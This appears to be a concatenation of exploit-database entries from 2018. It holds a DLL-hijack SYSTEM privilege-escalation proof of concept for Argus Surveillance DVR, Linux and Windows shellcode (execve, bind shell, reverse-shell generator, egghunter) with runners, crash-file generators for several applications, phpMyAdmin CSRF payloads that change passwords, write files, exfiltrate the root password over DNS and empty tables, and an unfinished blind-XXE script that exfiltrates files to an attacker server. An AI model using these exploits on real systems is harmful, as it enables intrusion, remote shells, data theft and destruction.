[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-SYSTEM-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec          


Greetz: ***Greetz: indoushka | Eduardo | GGA***


[Vendor]
www.argussurveillance.com



[Product]
Argus Surveillance DVR - 4.0.0.0

Our DVR software provides scheduled, continuous or activated upon motion detection video recording. You can monitor unlimited number of cameras, through Internet or on-site.
When our surveillance software detects motion in the monitored area, it sounds alarm, e-mails captured images, or records video.
This is security surveillance IP camera software. It has features to place image overlays and date/time stamps, adjust picture size / quality, and Pan/Tilt/Zoom control.


[Vulnerability Type]
SYSTEM Privilege Escalation



[CVE Reference]
N/A


[Security Issue]
Argus Surveillance DVR 4.0.0.0 devices allow Trojan File SYSTEM Privilege Escalation.
Placing a Trojan File DLL named "gsm_codec.dll" in Argus application directory will lead to arbitrary code execution with SYSTEM integrity.


[Affected Component]
DVRWatchdog.exe


[Exploit/POC]
create DLL 32bit DLL named "gsm_codec.dll" and place in App Dir, launch Argus DVR tada! your now SYSTEM.

#include <windows.h>

/* hyp3rlinx */

/*
gcc -c -m32 gsm_codec.c
gcc -shared -m32 -o gsm_codec.dll gsm_codec.o
*/

void systemo(){
   MessageBox( 0, "3c184981367094fce3ab70efc3b44583" , "philbin :)" , MB_YESNO + MB_ICONQUESTION );
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){
  switch(fdwReason){
    case DLL_PROCESS_ATTACH:{
       systemo();
      break;
    }
    case DLL_PROCESS_DETACH:{
       systemo();
      break;
    }
    case DLL_THREAD_ATTACH:{
       systemo();
      break;
    }
    case DLL_THREAD_DETACH:{
       systemo();
      break;
    }
  }

  return TRUE;
}



[Video POC URL]
https://vimeo.com/287115698



[Network Access]
Local


[Severity]
High



[Disclosure Timeline]
Vendor Notification: August 17, 2018
Second attempt: August 21, 2018
CVE Assigned Mitre: August 23, 2018
August 28, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

/*
Title:  Linux/ARM - execve("/bin/sh", ["/bin/sh"], NULL) Shellcode (32 Bytes)
Date:   2018-08-16
Tested: armv7l (Raspberry Pi 3 Model B+)
Author: Ken Kitahara

pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description:    Raspbian GNU/Linux 9.4 (stretch)
Release:    9.4
Codename:   stretch
pi@raspberrypi:~ $ cat binsh.s
.section .text
.global _start

_start:
    .ARM
    add  r3, pc, #1
    bx   r3

    .THUMB
    // execve("/bin/sh", ["/bin/sh"], NULL)
    adr  r0, spawn
    eor  r2, r2, r2
    strb r2, [r0, #7]
    push {r0, r2}
    mov  r1, sp
    mov  r7, #11
    svc  #1

    // adjust address
    eor  r7, r7, r7

spawn:
.ascii "/bin/shA"

pi@raspberrypi:~ $ as -o binsh.o binsh.s && ld -N -o binsh binsh.o
pi@raspberrypi:~ $ objcopy -O binary binsh binsh.bin
pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x"""' binsh.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x03\xa0\x52\x40\xc2\x71\x05\xb4\x69\x46\x0b\x27\x01\xdf\x7f\x40\x2f\x62\x69\x6e\x2f\x73\x68\x41

*/

#include<stdio.h>
#include<string.h>

unsigned char sc[] = \
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1"
"\x03\xa0\x52\x40\xc2\x71\x05\xb4"
"\x69\x46\x0b\x27\x01\xdf\x7f\x40"
"\x2f\x62\x69\x6e\x2f\x73\x68\x41";

void main()
{
    printf("Shellcode Length: %d\n", strlen(sc));

    int (*ret)() = (int(*)())sc;

    ret();
}

/*
# Exploit Title: Linux x86 Dual Network Stack (IPv4 and IPv6) Bind TCP Shellcode
# Date: 2018-08-18
# Shellcode Author: Kevin Kirsche
# Shellcode Repository: https://github.com/kkirsche/SLAE/tree/master/assignment_1-bind_shell
# Tested on: Shell on Ubuntu 18.04 with gcc 7.3.0 / Connected from Kali 2018.2

# This shellcode will listen on port 1337 on all of the host's IPv4 and IPv6 addresses and give you /bin/sh

This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE-1134

Compilation instructions:
    gcc -o shellcode shellcode.c -fno-stack-protector -z execstack

Commented NASM:
global _start

section .text

_start:
  ; socket
  ;; cleanup
  xor ebx, ebx
  ;; arguments
  push ebx        ; #define IP_PROTO 0
  push 0x1        ; #define SOCK_STREAM 1
  push 0xa        ; #define PF_INET6 10
  ;; function
  mov ecx, esp    ; pointer to args on the stack into ecx
  push 0x66
  pop eax         ; socketcall 0x66 == 102
  inc ebx         ; #define SYS_SOCKET 1
  ;; call
  int 0x80
  ;; returned data
  xchg esi, eax   ; sockfd eax -> esi

  ; setsocketopt
  ;; cleanup
  xor eax, eax
  ;; arguments
  push eax        ; NO = 0x0
  mov edx, esp    ; get a pointer to the null value
  push 0x2        ; sizeof(NO)
  push edx        ; pointer to NO
  push 0x1a       ; #define IPV6_V6ONLY 26
  push 0x29       ; #define IPPROTO_IPV6
  ;; function
  mov ecx, esp    ; pointer to args on the stack into ecx
  mov al, 0x66    ; socketcall 0x66 == 102
  mov bl, 0xe     ; #define SYS_SETSOCKOPT 14
  ;; call
  int 0x80

  ; bind ipv4
  ;; cleanup
  xor edx, edx
  ;; v4lhost struct
  push edx          ; #define INADDR_ANY 0
  push word 0x3905  ; port 1337 in big endian format
  push 0x2          ; #define AF_INET 2
  ;; arguments
  mov ecx, esp      ; pointer to v4lhost struct arguments
  push 0x10         ; sizeof v4lhost
  push ecx          ; pointer v4lhost
  push esi          ; push sockfd onto stack
  ;; function
  mov ecx, esp      ; argument pointer into ecx
  mov bl, 0x2       ; #define SYS_BIND 2
  mov al, 0x66      ; socketcall 0x66 == 102
  ;; call
  int 0x80

  ; bind ipv6
  ;; cleanup
  xor eax, eax
  ;; v6lhost struct
  push dword eax    ; v6_host.sin6_addr
  push dword eax
  push dword eax
  push dword eax
  push dword eax
  push word 0x3905  ; port 1337
  push word 0x0a    ; PF_INET6
  ;; arguments
  mov ecx, esp      ; pointer to struct into ecx
  push 0x1c         ; sizeof struct
  push ecx          ; pointer to struct
  push esi          ; sockfd
  ;; function
  mov ecx, esp      ; arguments into register
  mov bl, 0x2       ; #define SYS_BIND 2
  mov al, 0x66      ; socketcall 0x66 == 102
  ;; call
  int 0x80

  ; listen
  ;; arguments
  push byte 0x2     ; queuelimit = 2
  push esi          ; sockfd
  ;; function
  mov ecx, esp      ; pointer to args into ecx
  mov bl, 0x4       ; #define SYS_LISTEN 4
  mov al, 0x66      ; socketcall 0x66 == 102
  ;; call
  int 0x80

  ; accept
  ;; cleanup
  xor ebx, ebx
  ;;arguments
  push ebx          ; push NULL
  push ebx          ; push NULL
  push esi          ; sockfd
  ;; function
  mov ecx, esp      ; pointer to args into ecx
  mov bl, 0x5       ; #define SYS_ACCEPT 5
  mov al, 0x66      ; socketcall 0x66 == 102
  ;; call
  int 0x80
  ;; returned data
  xchg ebx, eax     ; ebx holds the new sockfd that we accepted

  ; dup file descriptor
  ;; setup counters
  sub ecx, ecx      ; zero out ecx
  mov cl, 0x2       ; create a counter
  ;; loop
duploop:
  mov al, 0x3f      ; SYS_DUP2 syscall
  int 0x80          ; call SYS_DUP2
  dec ecx           ; decrement loop counter
  jns duploop       ; as long as SF is not set, keep looping

  ; execve
  ;; cleanup
  xor edx, edx
  ;; command to run
  push edx          ; NULL string terminator
  push 0x68732f2f   ; hs//
  push 0x6e69622f   ; nib/
  ;; arguments
  mov ebx, esp      ; pointer to args into ebx
  push edx          ; null ARGV
  push ebx          ; command to run
  ;; function
  mov ecx, esp
  mov al, 0x0b      ; execve systemcall
  int 0x80
*/
#include <stdio.h>
#include <string.h>

unsigned char code[] = "\x31\xdb\x53\x6a\x01\x6a\x0a\x89\xe1\x6a\x66\x58\x43"
"\xcd\x80\x96\x31\xc0\x50\x89\xe2\x6a\x02\x52\x6a\x1a\x6a\x29\x89\xe1\xb0"
"\x66\xb3\x0e\xcd\x80\x31\xd2\x52\x66\x68\x05\x39\x6a\x02\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x50\x50\x50\x50\x66"
"\x68\x05\x39\x66\x6a\x0a\x89\xe1\x6a\x1c\x51\x56\x89\xe1\xb3\x02\xb0\x66"
"\xcd\x80\x6a\x02\x56\x89\xe1\xb3\x04\xb0\x66\xcd\x80\x31\xdb\x53\x53\x56"
"\x89\xe1\xb3\x05\xb0\x66\xcd\x80\x93\x29\xc9\xb1\x02\xb0\x3f\xcd\x80\x49"
"\x79\xf9\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52"
"\x53\x89\xe1\xb0\x0b\xcd\x80";


int main() {
  // pollute the registers
  asm("mov $0x78975432, %eax\n\t"
"mov $0x17645589, %ecx\n\t"
"mov $0x23149875, %edx\n\t");

  // begin shellcode
    printf("Shellcode Length:  %d\n", strlen(code));
  // execute our shellcode
    int (*ret)() = (int(*)())code;
    ret();
}

#!/usr/bin/env python3
# Exploit Title: Linux x86 IPv6 Reverse TCP Shellcode Generator (94 bytes)
# Date: 2018-08-26
# Shellcode Author: Kevin Kirsche
# Shellcode Repository: https://github.com/kkirsche/SLAE/tree/master/assignment_2-reverse_shell
# Tested on: Shell on Ubuntu 18.04 with gcc 7.3.0 / Connecting to Kali 2018.2

# This shellcode will connect to fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509 on port 1337 and give you /bin/sh

#This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
#http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
#Student ID: SLAE-1134

from argparse import ArgumentParser
from ipaddress import ip_address
import sys

sc = ("\\x31\\xdb\\x53\\x43\\x53\\x6a\\x0a\\x89\\xe1\\x6a\\x66\\x58\\xcd\\x80"
"\\x96\\x99\\x52\\x68{ipv6_fourth_octet}\\x68{ipv6_third_octet}\\x68"
"{ipv6_second_octet}\\x68{ipv6_first_octet}\\x52\\x66\\x68{port}"
"\\x66\\x6a\\x0a\\x89\\xe1\\x6a\\x1c\\x51\\x56\\x89\\xe1\\x43\\x43\\x6a"
"\\x66\\x58\\xcd\\x80\\x87\\xde\\x29\\xc9\\xb1\\x02\\xb0\\x3f\\xcd\\x80"
"\\x49\\x79\\xf9\\x31\\xd2\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62"
"\\x69\\x6e\\x89\\xd1\\x89\\xe3\\xb0\\x0b\\xcd\\x80")

if __name__ == '__main__':
    parser = ArgumentParser(description=("Dual Network Stack Bind Shell "
"Generator"))
    parser.add_argument('ip_address', type=str, nargs='?', default='fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509',
            help='The IP address to connect to (default fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509)')
    parser.add_argument('port', type=int, nargs='?', default=1337,
            help='The port to connect to (default 1337)')
    args = parser.parse_args()

    ip = ip_address(args.ip_address)
    ip_hex = ip.exploded

    if args.port < 1 or args.port > 65535:
        print('Invalid port. Please select a port between 1 and 65535')
        sys.exit(1)

    port = format(args.port, '04x')
    port = "\\x{b}\\x{a}".format(
            a=port[2:4],
            b=port[0:2]) 

    split_hex_ip = ip_hex.split(':')
    ipv6_fourth_octet = '\\x{d}\\x{c}\\x{b}\\x{a}'.format(
            d=split_hex_ip[6][0:2],
            c=split_hex_ip[6][2:4],
            b=split_hex_ip[7][0:2],
            a=split_hex_ip[7][2:4])
    ipv6_third_octet = '\\x{d}\\x{c}\\x{b}\\x{a}'.format(
            d=split_hex_ip[4][0:2],
            c=split_hex_ip[4][2:4],
            b=split_hex_ip[5][0:2],
            a=split_hex_ip[5][2:4])
    ipv6_second_octet = '\\x{d}\\x{c}\\x{b}\\x{a}'.format(
            d=split_hex_ip[2][0:2],
            c=split_hex_ip[2][2:4],
            b=split_hex_ip[3][0:2],
            a=split_hex_ip[3][2:4])
    ipv6_first_octet = '\\x{d}\\x{c}\\x{b}\\x{a}'.format(
            d=split_hex_ip[0][0:2],
            c=split_hex_ip[0][2:4],
            b=split_hex_ip[1][0:2],
            a=split_hex_ip[1][2:4])

    if '\\x00' in port:
        print('[!] Warning: The port you chose contains a null value.')
    if (('\\x00' in ipv6_fourth_octet) or ('\\x00' in ipv6_third_octet) or
            ('\\x00' in ipv6_second_octet) or ('\\x00' in ipv6_first_octet)):
        print('[!] Warning: The IP address you chose contains a null value.')

    print('Shellcode:')
    print(sc.format(
        ipv6_first_octet=str(ipv6_first_octet),
        ipv6_second_octet=str(ipv6_second_octet),
        ipv6_third_octet=str(ipv6_third_octet),
        ipv6_fourth_octet=str(ipv6_fourth_octet),
        port=str(port)))

#include <Windows.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
using namespace std;

/*

Title: WoW64Egghunter for Windows 10 (32bit apps on 64bit Windows 10)
Size: 50 bytes
Date: 26/08/2018
Author: n30m1nd - https://www.exploit-db.com/author/?a=8766
Works in: 32 bit processes on a 64 bit Windows 10 OS
How to: Compile under Visual Studio and run

Credit where credit is due:
- https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/
- https://j00ru.vexillium.org/syscalls/nt/64/
- https://www.exploit-db.com/exploits/41827/
- https://web.archive.org/web/20101215052055/http://vx.netlux.org/lib/vrg02.html

Shouts out to the Plakkers!

// Assembly

0:  8c cb                   mov    ebx,cs
2:  80 fb 23                cmp    bl,0x23
5:  33 d2                   xor    edx,edx
7:  66 81 ca ff 0f          or     dx,0xfff
c:  33 db                   xor    ebx,ebx
e:  42                      inc    edx
f:  52                      push   edx
10: 53                      push   ebx
11: 53                      push   ebx
12: 53                      push   ebx
13: 6a 29                   push   0x29
15: 58                      pop    eax
16: b3 c0                   mov    bl,0xc0 ; Heaven's gate
18: 64 ff 13                call   DWORD PTR fs:[ebx]
1b: 83 c4 0c                add    esp,0xc
1e: 5a                      pop    edx
1f: 3c 05                   cmp    al,0x5
21: 74 e4                   je     0x7
23: b8 77 30 30 74          mov    eax,0x74303077
28: 89 d7                   mov    edi,edx
2a: af                      scas   eax,DWORD PTR es:[edi]
2b: 75 e1                   jne    0xe
2d: af                      scas   eax,DWORD PTR es:[edi]
2e: 75 de                   jne    0xe
30: ff e7                   jmp    edi
*/

char n30m1ndhunter[] =
"\x8C\xCB\x80\xFB\x23\x33\xD2\x66\x81\xCA\xFF\x0F"
"\x33\xDB\x42\x52\x53\x53\x53\x6A\x29\x58\xB3\xC0"
"\x64\xFF\x13\x83\xC4\x0C\x5A\x3C\x05\x74\xE4\xB8"
"\x77\x30\x30\x74\x89\xD7\xAF\x75\xE1\xAF\x75\xDE"
"\xFF\xE7";

// msfvenom -p windows/exec cmd=calc.exe -f c
char scode[] = "w00tw00t" // Eggu
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x6a\x01\x8d\x85\xb2\x00\x00\x00\x50\x68\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5"
"\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a"
"\x00\x53\xff\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";

int main(int argc, char **argv)
{
    // Place the eggu (w00tw00t) in memory and make the shellcode executable
    void *eggfind = VirtualAlloc(0, sizeof scode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(eggfind, scode, sizeof scode);

    // Place the egghunter shellcode in memory and ...
    void *exec = VirtualAlloc(0, sizeof n30m1ndhunter, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    memcpy(exec, n30m1ndhunter, sizeof n30m1ndhunter);

    // ... jump to it
    ((void(*)())exec)();
}

/*
Title: Linux/ARM - read(0, buf, 0xff) stager + execve("/bin/sh", NULL, NULL) Shellcode (28 Bytes)
Date: 2018-08-30
Tested: armv7l (Raspberry Pi 3 Model B+)
Author: Ken Kitahara

pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description:    Raspbian GNU/Linux 9.4 (stretch)
Release:    9.4
Codename:   stretch
pi@raspberrypi:~ $ cat binsh.s
.section .text
.global _start

_start:
    .ARM
    add  lr, pc, #1
    bx   lr

    .THUMB
    // execve("/bin/sh", NULL, NULL)
    adr  r0, spawn
    eor  r1, r1, r1
    eor  r2, r2, r2
    strb r2, [r0, #7]
    mov  r7, #0xb
    svc  #1

spawn:
.ascii "/bin/shX"
pi@raspberrypi:~ $ as -o binsh.o binsh.s && ld -N -o binsh binsh.o
pi@raspberrypi:~ $ ./binsh
$ id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
$ exit
pi@raspberrypi:~ $ objcopy -O binary binsh binsh.bin
pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x"""' binsh.bin && echo
\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58
pi@raspberrypi:~ $ cat stager.s
.section .text
.global _start

_start:
    .ARM
    add  lr, pc, #1
    bx   lr

    .THUMB
    // load shellcode into stack region
    // read(0, buf, 0xff)
    eor  r0, r0, r0
    mov  r1, sp
    mov  r2, #0xff
    mov  r7, #3
    svc  #1

    // change to ARM state
    eor  r7, r7, r7
    mov  lr, pc
    bx   lr

    .ARM
    mov  pc, r1
pi@raspberrypi:~ $ as -o stager.o stager.s && ld -N -o stager stager.o
pi@raspberrypi:~ $ (echo -en "\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x58"; cat) | ./stager
id
uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
exit
^C
pi@raspberrypi:~ $ objcopy -O binary stager stager.bin
pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x"""' stager.bin && echo
\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x40\x40\x69\x46\xff\x22\x03\x27\x01\xdf\x7f\x40\xfe\x46\x70\x47\x01\xf0\xa0\xe1
pi@raspberrypi:~ $

*/

#include<stdio.h>
#include<string.h>

unsigned char sc[] = \
"\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1"
"\x40\x40\x69\x46\xff\x22\x03\x27"
"\x01\xdf\x7f\x40\xfe\x46\x70\x47"
"\x01\xf0\xa0\xe1";

void main()
{
    printf("Shellcode Length: %d\n", strlen(sc));

    int (*ret)() = (int(*)())sc;

    ret();
}

# Exploit Title: NASA openVSP 3.16.1 - Denial of Service (PoC)
# Exploit Author : L0RD
# Date: 2018-08-28
# Vendor Homepage : https://software.nasa.gov/software/LAR-17491-1
# Software link: https://github.com/nasa/OpenVSP
# Version: 3.16.1
# Tested on: Windows 10
# CVE: N/A

# Description :
# The Vehicle Sketch Pad (VSP) is an aircraft geometry tool for rapid
# evaluation of advanced design concepts.
# for more information , check out this page :
# https://software.nasa.gov/featuredsoftware/openvsp

# Steps to reproduce:
# 1) Run the python exploit code and open "poc.txt" file
# 2) Copy the content of file
# 3) Open "vsp.exe"
# 4) Navigate to "Geom browser" and click on Add
# 5) Then Navigate to "pod" and click on sub
# 6) Click on "Add" and paste the content of "poc.txt" into the "name" field
# 7) Click on add and Crash!

#!/usr/bin/python

buffer = "A" * 5000
payload = buffer
try:
    f=open("poc.txt","w")
    print "[+] Creating %s bytes payload..." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

# Exploit Title: Immunity Debugger 1.85 - Denial of Service (PoC)
# Author: Gionathan "John" Reale
# Date: 2018-08-28
# Homepage: https://www.immunityinc.com/
# Software Link: https://www.immunityinc.com/products/debugger/index.html
# Tested Version: v1.85
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "exploit.exe.txt".Start the program. In the new window click "File">"Open". 
# Now change the "Files of type" to # "Any file" and select "exploit.exe.txt" . 
# Click "Open" and you will see a crash.

#!/usr/bin/python

buffer = "A" * 6000

payload = buffer
try:
    f=open("exploit.exe.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

# Exploit Title: ipPulse 1.92 - 'TCP Port' Denial of Service (PoC)
# Discovery by: Diego Santamaria
# Discovery Date: 2018-08-28
# Vendor Homepage: https://www.netscantools.com/ippulseinfo.html
# Software Link: http://download.netscantools.com/ipls192.zip
# Tested Version: 1.92
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 7 Professional

# Steps to Reproduce: 

# 1. Run the python code TCP_port.py 
# 2. Open TCP_exploit.txt and copy the content 
# 3. Open ipPulse.exe 
# 4. Choose 'Target Editor'
# 5. write '1' in 'IP Adreess'
# 6. Paste the content from exploit.txt on 'TCP Port'
# 7. Press 'Add Above Fields to Target List'
# 8. Press ok and Crashed

#!/usr/bin/env python

content = "\x41" * 4087
f = open ("TCP_exploit.txt", "w")
f.write(content)
f.close()

 Exploit Title: Fathom 2.4 - Denial Of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-28
# Homepage: https://fathom.concord.org/
# Software Link: https://fathom.concord.org/download/
# Tested Version: v2.4
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "exploit.txt". Copy the content of the new file "exploit.txt". 
# Now start the program, in the field named: "Authorization Code" paste the "exploit.txt" content copied eariler.
# Click "Activate" and see a crash! 

#!/usr/bin/python

buffer = "A" * 6000

payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

# Exploit Title: Skype Empresarial Office 365 16.0.10730.20053 - 'DirecciA3n de inicio de sesiA3n' Denial of service (PoC)
# Discovery by: Samuel Cruz
# Discovery Date; 2018-08-29
# Vendor Homepage: https://www.skype.com/es/business/
# Tested Version: 16.0.10730.20053
# Tested on OS: Windows 10 Pro x64 es/home/

#Steps to produce the crash
#1.- Run python code : python SkypeforBusiness_16.0.10730.20053.py
#2.- Open SkypeforBusiness.txt and copy context to clipboard
#3.- Open Skype for business
#4.- Paste clipboard on "DirecciA3n de inicio de sesiA3n"
#5.- Iniciar sesiA3n
#6.- Crashed

buffer = "\x41" * 595
f = open ("SkypeforBusiness.txt", "w")
f.write(buffer)
f.close()

# Exploit Title: phpMyAdmin 4.7.x - Cross-Site Request Forgery
# Date: 2018-08-28
# Exploit Author: VulnSpy
# Vendor Homepage: https://www.phpmyadmin.net/
# Software Link: https://www.phpmyadmin.net/downloads/
# Version: Versions 4.7.x (prior to 4.7.7)
# Tested on: php7 mysql5
# CVE: CVE-2017-1000499

# Exploit CSRF - Modifying the password of current user

<p>Hello World</p>
<img src="
http://server/sql.php?db=mysql&table=user&sql_query=SET%20password
%20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" />

# Exploit CSRF - Arbitrary File Write

<p>Hello World</p>
<img src="
http://server/sql.php?db=mysql&table=user&sql_query=select
'<?php phpinfo();?>' into outfile '/var/www/html/test.php';"
style="display:none;" />

# Exploit CSRF - Data Retrieval over DNS

SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE
user='root' LIMIT 1),'.vulnspy.com\\test'));

# Exploit CSRF - Empty All Rows From All Tables

<p>Hello World</p>
<img src="
http://server/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A"
style="display:none;" />

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113

# Exploit Title: Episerver 7 patch 4 - XML External Entity Injection
# Google Dork: N/A
# Date: 2018-08-28
# Exploit Author: Jonas Lejon
# Vendor Homepage: https://www.episerver.se/
# Version: Episerver 7 patch 4 and below
# CVE : N/A

## episploit.py - Blind XXE file read exploit for Episerver 7 patch 4 and below
## Starts a listening webserver, so the exploits needs a public IP and unfiltered port, configure RHOST below!
## Usage: ./episploit.py <target> [file-to-read]

#!/usr/bin/python

from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
import urllib
import re
import sys
import time
import threading
import socket

SERVER_SOCKET   = ('0.0.0.0', 8000)
EXFIL_FILE      = 'file:///c:/windows/win.ini'

# The public facing IP. Change this
RHOST           = '1.2.3.4:' + str(SERVER_SOCKET[1])

EXFILTRATED_EVENT = threading.Event()

class BlindXXEServer(BaseHTTPRequestHandler):

    def response(self, **data):
        code = data.get('code', 200)
        content_type = data.get('content_type', 'text/plain')
        body = data.get('body', '')

        self.send_response(code)
        self.send_header('Content-Type', content_type)
        self.end_headers()
        self.wfile.write(body.encode('utf-8'))
        self.wfile.close()

    def do_GET(self):
        self.request_handler(self)

    def do_POST(self):
        self.request_handler(self)

    def log_message(self, format, *args):
        return

    def request_handler(self, request):
        global EXFILTRATED_EVENT

        path = urllib.unquote(request.path).decode('utf8')
        m = re.search('\/\?exfil=(.*)', path, re.MULTILINE)
        if m and request.command.lower() == 'get':
            data = path[len('/?exfil='):]
            print 'Exfiltrated %s:' % EXFIL_FILE
            print '-' * 30
            print urllib.unquote(data).decode('utf8')
            print '-' * 30 + '\n'
            self.response(body='true')

            EXFILTRATED_EVENT.set()

        elif request.path.endswith('.dtd'):
            print 'Sending malicious DTD file.'
            dtd = '''<!ENTITY %% param_exfil SYSTEM "%(exfil_file)s">
<!ENTITY %% param_request "<!ENTITY exfil SYSTEM 'http://%(exfil_host)s/?exfil=%%param_exfil;'>">
%%param_request;''' % {'exfil_file' : EXFIL_FILE, 'exfil_host' : RHOST}

            self.response(content_type='text/xml', body=dtd)

        else:
            print '[INFO] %s %s' % (request.command, request.path)
            self.response(body='false')

def send_stage1(target):
    content = '''<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://''' + RHOST + '''/test.dtd"><foo>&exfil;</foo>'''
    payload = '''POST /util/xmlrpc/Handler.ashx?pageid=1023 HTTP/1.1
Host: ''' + target + '''
User-Agent: curl/7.54.0
Accept: */*
Content-Length: ''' + str(len(content)) + '''
Content-Type: application/x-www-form-urlencoded
Connection: close

